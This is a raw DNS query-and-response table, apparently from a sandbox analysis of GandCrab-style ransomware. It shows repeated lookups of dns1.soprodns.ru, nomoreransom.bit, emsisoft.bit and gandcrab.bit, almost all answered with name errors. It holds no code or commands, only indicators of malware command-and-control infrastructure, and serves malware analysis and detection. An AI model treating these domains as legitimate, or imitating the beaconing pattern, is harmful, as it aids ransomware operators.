                                    Sep 1, 2022 00:03:19.167845011 CEST192.168.2.38.8.8.80x6266Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.219196081 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:19.239136934 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.259211063 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:19.277164936 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.297074080 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:19.834583998 CEST192.168.2.38.8.8.80x8bb8Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.952431917 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:19.972138882 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:19.992460012 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:20.011368036 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:20.034172058 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:20.228393078 CEST192.168.2.38.8.8.80x3233Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:20.265758991 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:20.284135103 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:20.304409027 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:20.324394941 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:20.348262072 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:20.534615040 CEST192.168.2.38.8.8.80x9a4bStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:21.523137093 CEST192.168.2.38.8.8.80x9a4bStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:21.620418072 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:21.642301083 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:21.664385080 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:21.687511921 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:21.709351063 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:21.888966084 CEST192.168.2.38.8.8.80x6c47Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:22.898207903 CEST192.168.2.38.8.8.80x6c47Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:22.935939074 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:22.956962109 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:22.978908062 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:23.000022888 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:23.021548986 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:23.209656954 CEST192.168.2.38.8.8.80x878dStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:23.980442047 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:23.998657942 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:24.019182920 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:24.040007114 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:24.060420036 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:24.239500046 CEST192.168.2.38.8.8.80xa1caStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.226500988 CEST192.168.2.38.8.8.80xa1caStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.263760090 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:25.281759977 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.300157070 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:25.320561886 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.341169119 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:25.538189888 CEST192.168.2.38.8.8.80xa11dStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.576621056 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:25.594151020 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.612011909 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:25.632008076 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:25.650229931 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:25.840779066 CEST192.168.2.38.8.8.80xc72eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:26.836159945 CEST192.168.2.38.8.8.80xc72eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:26.882740974 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:26.907030106 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:26.929732084 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:26.954768896 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:26.976847887 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:27.174635887 CEST192.168.2.38.8.8.80xb6eaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:28.164587021 CEST192.168.2.38.8.8.80xb6eaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:28.343839884 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:28.363595009 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:28.520062923 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:28.538480043 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:28.558638096 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:28.762604952 CEST192.168.2.38.8.8.80xe04eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:29.344712973 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:29.362481117 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:29.383908987 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:29.402066946 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:30.012593985 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:30.204734087 CEST192.168.2.38.8.8.80x83d5Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:30.891808033 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:31.975245953 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:31.996526957 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:32.036712885 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:32.055555105 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:32.280885935 CEST192.168.2.38.8.8.80x14b6Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:32.339962959 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:32.361099958 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:32.382333040 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:32.403374910 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:32.424187899 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:32.614773035 CEST192.168.2.38.8.8.80xedcaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:33.602144957 CEST192.168.2.38.8.8.80xedcaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:33.674870014 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:33.695070028 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:33.715890884 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:33.736226082 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:33.756469965 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:33.940355062 CEST192.168.2.38.8.8.80xa3fcStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:34.015136957 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:34.032989979 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:34.053456068 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:34.075906992 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:34.095324039 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:34.286489964 CEST192.168.2.38.8.8.80xbc05Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:35.289774895 CEST192.168.2.38.8.8.80xbc05Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:35.959451914 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:35.979600906 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:36.001168966 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:36.023380995 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:36.045305967 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:36.244251013 CEST192.168.2.38.8.8.80x25c4Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:37.243447065 CEST192.168.2.38.8.8.80x25c4Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:37.287781000 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:37.309587002 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:37.331573009 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:37.351948977 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:37.373698950 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:37.563853979 CEST192.168.2.38.8.8.80x8bcStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:38.572907925 CEST192.168.2.38.8.8.80x8bcStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:38.657994032 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:38.678469896 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:38.699985027 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:38.722516060 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:38.741457939 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Sep 1, 2022 00:01:24.030497074 CEST8.8.8.8192.168.2.30x76aeName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:24.067482948 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:24.088715076 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:24.110754013 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:24.144764900 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:24.164725065 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:25.283262014 CEST8.8.8.8192.168.2.30xb801Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:25.327796936 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:25.346643925 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:25.366964102 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:25.385024071 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:25.405503035 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:27.449457884 CEST8.8.8.8192.168.2.30xa52fName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:27.481861115 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:27.502418995 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:27.520689964 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:27.550129890 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:27.573137045 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:34.108952045 CEST8.8.8.8192.168.2.30x9347Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:34.169861078 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:34.192428112 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:34.214257956 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:34.234899998 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:34.256675959 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:38.424983025 CEST8.8.8.8192.168.2.30x69c7Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:38.459913969 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:38.478588104 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:38.499536037 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:38.522388935 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:38.547306061 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:39.520437956 CEST8.8.8.8192.168.2.30x69c7Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:39.869720936 CEST8.8.8.8192.168.2.30xc269Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:39.914973974 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:39.951137066 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:39.971240997 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:39.989907026 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:40.010957003 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:40.783550978 CEST8.8.8.8192.168.2.30x69c7Server failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:41.194181919 CEST8.8.8.8192.168.2.30xf1f3Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:41.280056000 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:41.300605059 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:41.320178032 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:41.341320992 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:41.369268894 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:42.639774084 CEST8.8.8.8192.168.2.30x8baName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:42.685431004 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:42.707127094 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:42.729058981 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:42.750449896 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:42.771682978 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:43.786712885 CEST8.8.8.8192.168.2.30x25e1Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:43.837654114 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:43.857835054 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:43.878863096 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:43.902585030 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:43.922862053 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:45.412717104 CEST8.8.8.8192.168.2.30x51fbName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:45.450937986 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:45.472791910 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:45.495043039 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:45.514930964 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:45.535151958 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:46.863656044 CEST8.8.8.8192.168.2.30xb432Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:46.913108110 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:46.933680058 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:46.953710079 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:46.973721981 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:46.994463921 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:50.163376093 CEST8.8.8.8192.168.2.30x1543Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:50.211262941 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:50.265369892 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:50.285290956 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:50.507364035 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:50.561597109 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:50.793282986 CEST8.8.8.8192.168.2.30x1543Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:52.259315968 CEST8.8.8.8192.168.2.30x1543Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:53.162805080 CEST8.8.8.8192.168.2.30x84Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:53.225925922 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:53.246345043 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:53.271325111 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:53.289664030 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:53.310367107 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:54.812717915 CEST8.8.8.8192.168.2.30x1368Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:54.875181913 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:54.897751093 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
